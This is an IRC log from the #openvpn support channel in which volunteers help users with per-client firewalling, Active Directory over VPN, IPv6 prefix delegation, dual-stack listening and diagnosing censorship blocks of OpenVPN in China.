here 21:32 <+pekster> troker: No. You don't want "per client routing rule" on your server. You stop traffic from going where you don't want it to with a firewall 21:32 <+pekster> You may of course opt not to push the route to a specific client, but anyone with admin access on the client can simply add a route back in 21:32 < troker> pekster: ok, that makes a lot of sense - any thoughts on implanting per-clinet firewalling? 21:33 <+pekster> You can do per-client firewalling by using a --client-connect script that has access to the variables for the client. Specifically, the $common_name env-var lets you see who is connecting, and take action based on the user 21:33 <+pekster> troker: See the manpage section titled 'SCRIPTING AND ENVIRONMENTAL VARIABLES' to get an idea of all the variables available to you. You're going to be interested in the $remote_ip and $common_name, most likely 21:34 <+pekster> Cook up a way to do any on-demand firewall rules when the client connects, and remove them when the client disconnects 21:36 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Remote host closed the connection] 21:37 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has quit [Ping timeout: 240 seconds] 21:39 < troker> pekster: Thanks so much! I will look into it! 21:40 <+pekster> Someday when I'm motivated I'll write a handy openvpn/netfilter per-client integration script suite. But not tonight 21:40 <+pekster> I did one for a prior employer, but sadly that's not copyleft and is locked up in their SVN repos :( 21:41 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 21:45 -!- mintuser [~mintuser@cpe-74-73-157-238.nyc.res.rr.com] has quit [Quit: Leaving] 22:11 -!- guest061 [~yaaic@cpe-74-73-157-238.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 22:14 -!- Saviq [~Saviq@canonical/saviq] has quit [Ping timeout: 248 seconds] 22:17 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 22:23 <@krzee> pekster, i have 2 isps, so i make 2 links to the same server (1 on each isp) 22:24 <@krzee> well in reality each side has 2 isps, there are 2 separate servers running on the same iron (1 listening on each isp) 22:24 <+pekster> Recent kernels added some really interesting looking new feature, basically NIC-teaming for arbitrary links like that 22:25 <+pekster> I don't know if you wanted strictly failover, or a teaming solution. I just noticed it long enough to press 'n' when make oldconfig wanted to know what it was 22:25 <@krzee> strictly failover, no traffic over link b until link a is down 22:29 <+pekster> If you can determine the link-down event (ie: if it's clean and something a distro's if-down script would catch) you could adjust ip routes or rules to send over the 2nd tunnel 22:29 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 248 seconds] 22:30 <@krzee> active directory requires layer2, right> 22:30 <+pekster> Nope. Maybe if you're trying to use broadcast NBNS, but I'd call that doing it wrong 22:30 <@krzee> as would i 22:30 <@krzee> i thought it needed layer2, thats great 22:30 <+pekster> With a proper-functioning DNS setup Windows AD works just fine over L3 22:31 <@krzee> theres no internal dns setup outside of what AD does by itself to work 22:31 <+pekster> (proper being 'send all DNS with anything related to the AD domaon to the authoratitive DC's DNS servers) 22:31 <@krzee> ahh ok, that can be done 22:31 <@krzee> dnsmasq would be easy enough for that 22:32 <+pekster> Yea. I used a split-horizon DNS and split-routing when I supported perma-remote employees with embedded hardware last job 22:32 <+pekster> Really slick solution 22:32 <+pekster> You could even join/remove PCs from the domain from their desk thousands of miles from the office/colo with the DC's 22:33 <+pekster> The VoIP had to have some hand-holding to get the tftp boot stuff working, but even that wasn't too bad with dnsmasq 22:33 <@krzee> well im damned glad to find that i dont need layer2 22:33 <+pekster> The solution is "ship it, plug it in, a little fine-tuning the QoS master control knobs, and the employee is set" 22:34 <+pekster> That crap lived for months too without a reboot. The family dog or a move was more likely to interrupt service ;) 22:34 <@krzee> that means all i need to do is configure dnsmasq (sounds like a very simple config) and join it to the domain 22:34 <+pekster> Yea 22:34 <@krzee> hah and i already have dnsmasq running there! 22:35 <+pekster> AD does everything over L3 fine. It's the concept of "Active" or even being a "Directory" I'll take issue with. Just because you can connect to it via jxplorer does not mean it's actually LDAP :P 22:36 <@krzee> orly? i thought it was basically just a complex ldap schema 22:36 <@krzee> in fact someone told me they hacked up a ldap to interact with AD 22:37 <+pekster> Sorta, kinda. With undocumented land mines thrown in there too because someone's monkey got access to visual studio that week 22:37 <@krzee> hahha 22:37 <+pekster> http://xkcd.com/323/ 22:37 <@vpnHelper> Title: xkcd: Ballmer Peak (at xkcd.com) 22:38 <@krzee> nice 22:38 <+pekster> AD:LDAP::Citrix:VPN 22:38 -!- brute11k1 [~brute11k@89.249.230.232] has quit [Quit: Leaving.] 22:39 <+pekster> Don't you know Citrix has a nice big "Connect" button? Why don't we do that? :) 22:45 < ngharo> print drivers. ohhh the humanity 22:47 <+pekster> I was highly-impressed with whatever fancy MFD Ricoh printer/copy/fax/pure-awesome device the last company with money I worked at had. They actually produced driver sources that built cleanly on a modern Linux system and the ppd "just worked" in CUPS. I was floored that a company could actually get that right :P 22:48 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Read error: Connection reset by peer] 22:48 < ngharo> wow 22:48 < ngharo> thats like unheard of 22:48 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 22:48 < ngharo> granted all my citrix knowledge is from 7 years ago 22:48 <+pekster> I was indeed skeptical when the INSTALL docs basically read "extract, run make, and install the ppd file into your CUPS browser" but then it actually worked 22:48 <+pekster> Oh, printers and Citrix? Yea, they've grown up a bit with "universal" print drivers 22:49 <+pekster> Of course, if you can't get those, you're screwed :P 22:49 < ngharo> HP had some back then, i started enforcing a policy if it dont work with UPD, not supporting 22:49 <+pekster> Yup. We've got enough printing standards. Now we need OS/printer combinations that actually work with them :P 22:50 < ngharo> the citrix udp sucked, spooled up 2GB jobs for a two page doc 22:50 <+pekster> http://xkcd.com/927/ 22:50 <@vpnHelper> Title: xkcd: Standards (at xkcd.com) 22:50 -!- troker_ [~troker@174.142.10.177] has joined #openvpn 22:51 -!- troker_ [~troker@174.142.10.177] has quit [Client Quit] 22:51 < ngharo> pekster: did you post that message to the dev list re: nsis script? 22:51 <+pekster> Yup 22:52 < ngharo> nice writeup :) 22:52 <+pekster> I meant to do that a few days back when I finally tracked the source lines against my PE output 22:52 <+pekster> I just got lost in some other project 22:52 < ngharo> i saw a commit that touched on it, any progress on it? 22:52 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Ping timeout: 245 seconds] 22:52 < ngharo> didn't see any replies to you post :/ 22:52 <+pekster> I'm not sure it's the commit that's the problem 22:53 <+pekster> Near as I can tell the person to build the installer that got released didn't use the latest sources, at least of the openvpn-build project 22:53 <+pekster> And that source file is 6mo old when I wrote that email 22:53 < ngharo> i think they should get rid of github or update it 22:53 <+pekster> Maybe there's some tagging or voting system; I'm not really up on how changes get voted on for inclusion to release targets 22:53 < ngharo> it's a source of confusion 22:54 <+pekster> That's the only place I found the nsis stuff; it's not in any of the source tgz or zips on the official site 22:54 <+pekster> It's not hard to believe the nsis crap hasn't been touched for a while 22:56 < ngharo> i suppose 22:59 <@krzee> grr 22:59 <@krzee> remote desktop over remote desktop over vpn over vpn 22:59 <@krzee> with 2 shitty connections in the mix 22:59 <@krzee> just need to get 1 route command entered, lol 23:00 <+pekster> How fast can you install sshd.exe on those RDP hosts? ;) 23:00 <+pekster> When I learned that cygwin had functional sshd support, I was quite happy ;) 23:00 <@krzee> more time than adding the route 23:02 <+pekster> If you're using rdesktop, the '-x modem' arg tends to do wonders 23:02 <+pekster> There's a bitrate flag too. -a I think? -a 15 is a nice compromize between usability and throughput 23:02 <@krzee> booya finally got a cmd 23:39 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Quit: Herpa la Derpa] 23:56 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn --- Day changed Thu Jan 24 2013 00:01 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 00:07 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!] 00:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 01:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 01:28 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:28 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:28 -!- mode/#openvpn [+o krzee] by ChanServ 01:30 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 01:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Client Quit] 01:34 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 01:44 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 01:46 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 01:53 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:59 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds] 02:02 -!- ade_b [~Ade@109.58.197.188.bredband.tre.se] has joined #openvpn 02:02 -!- ade_b [~Ade@109.58.197.188.bredband.tre.se] has quit [Changing host] 02:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:26 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 02:26 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 02:52 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:21 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 03:25 -!- Orbi [~opera@anon-185-65.vpn.ipredator.se] has joined #openvpn 03:30 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:56 -!- zz_AsadH is now known as AsadH 03:59 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has joined #openvpn 04:03 -!- brute11k [~brute11k@89.249.230.232] has joined #openvpn 04:16 -!- dazo_afk is now known as dazo 04:53 -!- master_of_master [~master_of@p57B5402B.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 04:54 -!- master_of_master [~master_of@p57B53A40.dip.t-dialin.net] has joined #openvpn 04:59 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 05:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:15 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- IRC with a difference] 06:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 06:17 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:29 < AsadH> novaflash: http://i.imgur.com/nrg3nuy.gif 06:29 < AsadH> oops, wrong channel 06:29 <@novaflash> that poor cat 06:30 <@novaflash> but i do like wet pussy though 06:31 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn 06:32 < draggawagga> Hey, no native english speaker here, i have a question. Is there a good method to find out whether my isp or the gfw (sitting in china) is blocking my university openvpn network? 06:33 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Quit: Leaving] 06:34 <@novaflash> china is blocking openvpn connections yes. the best way to find out would be to try it and fail :-P 06:34 <@novaflash> but anyways, you should see RST responses when trying to connect 06:34 <@novaflash> and if you change port, and it works for a little while, and then gets blocked - that's the GFW at work 06:36 < rob0> RST is TCP-only. If you're using UDP as you should, use a nonstandard port, and vary it when (or before!) it gets detected. 06:37 <@novaflash> or, stage a coup and take over the chinese government, and remove the firewall 06:39 < draggawagga> I can't connect the network, same with the openvpn website :p. Have to find out whether it may be my university network here in china or the provider+(or gfw). Coup is too difficult, insufficient language skills :p, rest is no problem. 06:41 <@novaflash> yeah that's more complicated. try setting up a TCP connection,and if it is blocked, run wireshark on it to see where it is being blocked and try to find out if that's in the network of your university, or beyond 06:41 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 246 seconds] 06:42 < draggawagga> Thanks, will try that out. 06:45 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 248 seconds] 06:48 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 06:49 -!- draggawagga [~oukai@183.62.57.74] has quit [Quit: Verlassend] 06:57 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn 06:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 07:03 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso] 07:04 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has joined #openvpn 07:04 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 07:05 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has quit [Client Quit] 07:09 < draggawagga> Okay, over TCP to my university-vpn to europe, in wireshark i only get information about the VPN-server and my chinese university network. that should mean it is my chinese university right? 07:13 -!- Orbi [~opera@anon-185-65.vpn.ipredator.se] has quit [Quit: Orbi] 07:25 -!- draggawagga [~oukai@183.62.57.74] has quit [Quit: Verlassend] 07:29 -!- brute11k [~brute11k@89.249.230.232] has quit [Ping timeout: 245 seconds] 07:30 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn 07:40 -!- draggawagga [~oukai@183.62.57.74] has quit [Remote host closed the connection] 07:42 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 08:19 -!- APTX_ is now known as APTX 08:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 08:39 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 08:39 <@dazo> novaflash: you can also point users at obfsproxy from the TOR project ... using obfsproxy in socks mode, and add --socks-proxy to the openvpn config ... but you need obfsproxy on the server side as well 08:40 <@novaflash> dazo; yah but he only asked how to figure out where the block is, lol. thanks ; 08:40 <@novaflash> ;) 08:40 <@dazo> if in china, presume the gov block it :) 08:41 <@novaflash> certainly 08:56 -!- Steven_ [~deepstar@pegasus.singularity.be] has quit [Quit: leaving] 09:29 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 09:45 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 246 seconds] 09:49 -!- dazo is now known as dazo_afk 09:52 <@ecrist> !windows 09:52 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny 09:58 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:11 -!- raidz_away is now known as raidz 10:19 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 10:31 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 246 seconds] 10:32 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 10:40 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 255 seconds] 10:41 -!- MeanderingCode_ [~Meanderin@server-176.53.69.120.as42926.net] has joined #openvpn 10:41 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds] 10:46 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 10:46 -!- brute11k [~brute11k@89.249.230.106] has joined #openvpn 10:46 * ecrist lols at IRC drama 10:46 -!- MeanderingCode_ [~Meanderin@server-176.53.69.120.as42926.net] has quit [Ping timeout: 240 seconds] 10:49 -!- Valcorb [~Valcorb@199.229.249.189] has quit [] 10:52 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 10:53 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 10:53 < soapee01> anybody seen krzee lately? 10:56 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 10:57 < ngharo> maybe 10:57 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 10:59 <@ecrist> yes, what do you need soapee01 11:00 < soapee01> ecrist pm ok? 11:00 <@ecrist> no 11:00 <@ecrist> !topsecret 11:00 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 11:00 < soapee01> it's not setup related. 11:01 < soapee01> I'm not looking for help. openvpn works fine for me! 11:01 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 240 seconds] 11:03 <@ecrist> !seen krzee 11:03 <@vpnHelper> krzee was last seen in #openvpn 12 hours and 28 seconds ago: booya finally got a cmd 11:03 <@ecrist> :) 11:03 < soapee01> t/y ecrist. I'll linker here... 11:04 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:04 < soapee01> linger even... 11:06 < soapee01> oh, thank you guys for openvpn connect on iphone. that solves major headaches for everybody! Now I gotta borrow one to test... 11:09 <@ecrist> keep in mind, neither iphone for android client can do bridged VPN 11:11 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 248 seconds] 11:15 < soapee01> bridged in what way? as in a tap wan setup with tun to mobiles? or bridging the wifi sharing on the phone? 11:20 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:20 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:20 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:25 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Remote host closed the connection] 11:25 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 11:28 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:29 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 276 seconds] 11:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 11:45 < BtbN> Is it possible to make OpenVPN request the IPv6 subnet it serves via DHCPv6, and then announce that it routes this subnet via radv-protocol? 11:49 < rob0> I doubt such functionality has yet been implemented. 11:50 < rob0> but maybe you can script something to be similar. 11:54 -!- AsadH is now known as zz_AsadH 11:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:03 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 12:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 244 seconds] 12:27 < BtbN> rob0: I'd have to modify the openvpn.conf each time the addvertisment changes, or is there some kind of "include", so i can just write the address to a file, and make openvpn notice any changes? 12:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 12:40 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 12:43 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 246 seconds] 12:58 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 13:00 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 13:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 13:13 < BtbN> So i realy have to modify my entire config file? Can't find anything include-like oO 13:14 <+pekster> He said script, not change config 13:14 <+pekster> ie: --up or --route-up 13:15 <+pekster> Further reading in the manpage: the section titled 'SCRIPTING AND ENVIRONMENTAL VARIABLES' 13:15 < BtbN> pekster: i have a script run by the dhcpv6 which gets told the prefix 13:15 < BtbN> and i have to somehow get this into the openvpn config 13:16 <+pekster> the ipv6 addressing comes from outside openvpn then? on the raw link, or inside the tunnel? 13:16 < BtbN> I request a prefix delegation from my router via DHCPv6 13:16 < BtbN> and want OpenVPN to use that prefix 13:17 < BtbN> i already have a script which writes the neccesary openvpn config line into a file, i now just need to include it 13:17 <+pekster> --config 13:18 < BtbN> i can just write config into a configuration file, and it will load the second file? 13:18 <+pekster> Yup 13:18 <+pekster> You can even HUP a running process to re-read the config 13:19 < BtbN> oh, that's great, so i don't have to restart it 13:19 <+pekster> Well, it's more or less a "restart" as far as clients are concerned, but the PID itself stays running 13:28 < BtbN> hm, killal -SIGHUP openvpn just kills it oO 13:28 < BtbN> +l 13:29 <+pekster> Perhaps you're downgrading runtime privs without the correct --persist-* options to support a HUP? 13:29 < BtbN> ah, it fails as OpenVPN tries to re-read the keys, which it no longer has permissions to 13:29 <+pekster> Check logs. A HUP is not the same from INT/TERM 13:29 < BtbN> yeah, exactly that 13:29 <+pekster> Yea 13:30 < BtbN> hm, persist-key and persist-tun is set 13:30 <+pekster> You probably can't use persist-tun since you need to change networking if the network range you're using changes 13:30 < rob0> I think there is a SIGNALS section in the man page. 13:30 <+pekster> ie: you can't downgrade privs and also expect ifconfig to have root access to change networking/routes 13:31 < rob0> SIGHUP Cause OpenVPN to close all TUN/TAP and network connections, restart, re-read the configuration file (if any), and reopen TUN/TAP and network connections. 13:31 <+pekster> BtbN: The --user manpage description does a good job explaining what you can and cannot expect to work if you need to HUP/USR1 the process with reduced privs 13:33 < BtbN> I have not set any user/group. Seems like it's my distros init-script which does it 13:33 < rob0> (You can expect it, but you will be disappointed. :) ) 13:34 <+pekster> manpages often change exceptations :P 13:35 <+pekster> BtbN: Some init scripts grep for 'user' and 'group' and set them if undefined. Set them to root or modify your initscript to avoid this behaviour 13:36 <+pekster> Better yet, patch it to be a config option and send your distro a patch ;) 13:38 < BtbN> Theoreticaly it's working now :D 13:39 < BtbN> But i get a /62 13:43 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 13:48 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:49 -!- mode/#openvpn [+o krzee] by ChanServ 13:51 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 13:54 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 13:58 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 14:01 -!- zz_AsadH is now known as AsadH 14:08 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 14:14 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:27 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 14:37 <@krzee> soapee01, hows it going 14:43 -!- mdw- [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 14:50 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 272 seconds] 14:53 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 15:23 < BtbN> How do i make OpenVPN listen on v4 and v6/dual-v6? It only listens on 0.0.0.0 currently 15:24 <@krzee> ild guess --local6 or something, have a look at the 2.3 manual 15:24 <@krzee> !man 15:24 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 15:25 < BtbN> I already read the whole man page, couldn't find information about this 15:26 <@krzee> 1sec 15:26 < BtbN> I only found on google that it is possible with 2.3.0, but not how 15:27 <@krzee> proto udp6 15:28 <@krzee> http://www.ipsidixit.net/2010/06/21/openvpn-over-ipv6/ 15:28 <@vpnHelper> Title: OpenVPN over IPv6 « ipsidixit.net (at www.ipsidixit.net) 15:28 <@krzee> i cant speak for tht link, but it looks like it does what you said more or less 15:29 < BtbN> it's listening on IPv6 only with that, so lets hope it also accepts ipv4 15:36 < BtbN> yes it does :) 15:39 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 15:44 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:57 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 244 seconds] 16:13 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 16:21 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 16:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Read error: Operation timed out] 16:30 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 16:36 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"] 16:38 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:57 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 16:57 -!- mode/#openvpn [+v s7r] by ChanServ 16:58 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 17:03 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:03 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:03 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:03 -!- mode/#openvpn [+o krzee] by ChanServ 17:06 -!- AsadH is now known as zz_AsadH 17:25 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 248 seconds] 17:25 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Ping timeout: 245 seconds] 17:26 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 17:28 -!- _polto_ [~polto@dslpre0565.worldcom.ch] has joined #openvpn 17:28 -!- _polto_ [~polto@dslpre0565.worldcom.ch] has quit [Changing host] 17:28 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 17:28 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 17:31 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Quit: Rolybrau] 17:40 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer] 17:59 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection] 18:07 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 18:09 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Client Quit] 18:29 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has quit [Quit: ZNC - http://znc.in] 18:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds] 18:30 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn 18:31 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 18:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:37 -!- mode/#openvpn [+o krzee] by ChanServ 18:43 -!- ThersiT [~AndChat50@unaffiliated/thersit] has joined #openvpn 18:46 < ThersiT> Is there any way, using the openvpn-auth-pam.so plugin, to ask one client for a user/pass but not others? 18:50 -!- ThersiT is now known as ThersiT1 18:51 -!- ThersiT [~ThersiT@unaffiliated/thersit] has joined #openvpn 18:52 -!- ThersiT1 [~AndChat50@unaffiliated/thersit] has left #openvpn ["Leaving"] 19:00 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 19:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 19:04 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 19:05 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit [] 19:05 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Client Quit] 19:07 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 19:07 <@krzee> ThersiT, not sure, you could try putting it in a ccd 19:08 < ThersiT> ccd? 19:09 <@krzee> !ccd 19:09 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 19:09 < ThersiT> Oh, that sounds pretty good. I'll give it a shot. 19:11 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 245 seconds] 19:11 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 19:12 <@krzee> not everything works in ccd entries, but maybe it will 19:12 <@krzee> if --plugin does not work there, see if a script will 19:12 <@krzee> !script 19:12 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 19:14 < ThersiT> What I'm trying to do is, I've got a laptop that the company I work for owns. I would like to set it up to connect to my personal VPN but sometimes I have to loan the laptop to a co-worker and I don't want them to have free access to my VPN. 19:14 < ThersiT> Do you think this plugin is the way to go or is there a simpler way? 19:20 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 19:24 <@krzee> i dont use password auth 19:24 <+pekster> Why are you using PAM at all then? X509 with a password-protected private key would be plenty sufficient 19:24 